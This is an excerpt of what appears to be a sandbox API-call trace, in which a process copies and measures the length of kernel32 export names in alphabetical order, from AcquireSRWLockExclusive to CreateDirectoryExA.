lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0179.278] lstrcpyA (in: lpString1=0x31ce648, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0179.278] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0179.278] lstrcpyA (in: lpString1=0x31ce648, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0179.278] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0179.278] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0179.278] lstrlenA (lpString="ADDATOMA") returned 8 [0179.278] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0179.278] lstrlenA (lpString="ADDATOMW") returned 8 [0179.278] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0179.278] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0179.278] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0179.278] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0179.278] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0179.278] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0179.278] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0179.278] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0179.278] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0179.278] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0179.278] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0179.278] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0179.278] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0179.278] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0179.278] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0179.279] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0179.279] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0179.279] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0179.279] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0179.279] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0179.279] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0179.279] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0179.279] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0179.279] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0179.279] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0179.279] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0179.279] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0179.279] lstrlenA (lpString="BACKUPREAD") returned 10 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0179.279] lstrlenA (lpString="BACKUPSEEK") returned 10 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0179.279] lstrlenA (lpString="BACKUPWRITE") returned 11 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0179.279] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0179.279] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0179.279] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0179.279] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0179.279] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0179.280] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0179.280] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0179.280] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0179.280] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0179.280] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0179.280] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0179.280] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0179.280] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0179.280] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0179.280] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0179.280] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0179.280] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0179.280] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0179.280] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0179.280] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0179.280] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0179.280] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0179.280] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0179.280] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0179.280] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0179.280] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0179.280] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0179.280] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0179.280] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0179.280] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0179.280] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0179.280] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0179.280] lstrcpyA (in: lpString1=0x31ce648, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0179.280] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0179.280] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0179.280] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0179.280] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0179.280] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0179.280] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0179.280] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0179.281] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0179.281] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0179.281] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0179.281] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0179.281] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0179.281] lstrlenA (lpString="BEEP") returned 4 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0179.281] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0179.281] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0179.281] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0179.281] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0179.281] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0179.281] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0179.281] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0179.281] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0179.281] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0179.281] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0179.281] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0179.281] lstrlenA (lpString="CANCELIO") returned 8 [0179.281] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0179.282] lstrlenA (lpString="CANCELIOEX") returned 10 [0179.282] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0179.282] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0179.282] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0179.282] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0179.282] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0179.282] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0179.282] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0179.282] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0179.282] lstrcpyA (in: lpString1=0x31ce648, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0179.282] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0179.282] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0179.282] lstrlenA (lpString="CHECKELEVATION") returned 14 [0179.282] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0179.282] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0179.282] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0179.282] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0179.282] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0179.282] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0179.282] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0179.282] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0179.282] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0179.282] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0179.282] lstrcpyA (in: lpString1=0x31ce648, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0179.282] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0179.282] lstrcpyA (in: lpString1=0x31ce648, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0179.282] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0179.282] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0179.282] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0179.282] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0179.282] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0179.282] lstrcpyA (in: lpString1=0x31ce648, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0179.282] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0179.282] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0179.282] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0179.282] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0179.282] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0179.283] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0179.283] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0179.283] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0179.283] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0179.283] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0179.283] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0179.283] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0179.283] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0179.283] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0179.283] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0179.283] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0179.283] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0179.283] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0179.283] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0179.283] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0179.283] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0179.283] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0179.283] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0179.283] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0179.283] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0179.284] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0179.284] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0179.284] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0179.284] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0179.284] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0179.284] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0179.284] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0179.284] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0179.284] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0179.284] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0179.284] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0179.284] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0179.284] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0179.284] lstrlenA (lpString="COPYCONTEXT") returned 11 [0179.284] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0179.284] lstrlenA (lpString="COPYFILEA") returned 9 [0179.284] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0179.284] lstrlenA (lpString="COPYFILEEXA") returned 11 [0179.284] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0179.284] lstrlenA (lpString="COPYFILEEXW") returned 11 [0179.284] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0179.284] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0179.284] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0179.284] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0179.284] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0179.284] lstrlenA (lpString="COPYFILEW") returned 9 [0179.284] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0179.284] lstrlenA (lpString="COPYLZFILE") returned 10 [0179.284] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0179.284] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0179.284] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0179.284] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0179.284] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0179.284] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0179.284] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0179.284] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0179.285] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0179.285] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") 